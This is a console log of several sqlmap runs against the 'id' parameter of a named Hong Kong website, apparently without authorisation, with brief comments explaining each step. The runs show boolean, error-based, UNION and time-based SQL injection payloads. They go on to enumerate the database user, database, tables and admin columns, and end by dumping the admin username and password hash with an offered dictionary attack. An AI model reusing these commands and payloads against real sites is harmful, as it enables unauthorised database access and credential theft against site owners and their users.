D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>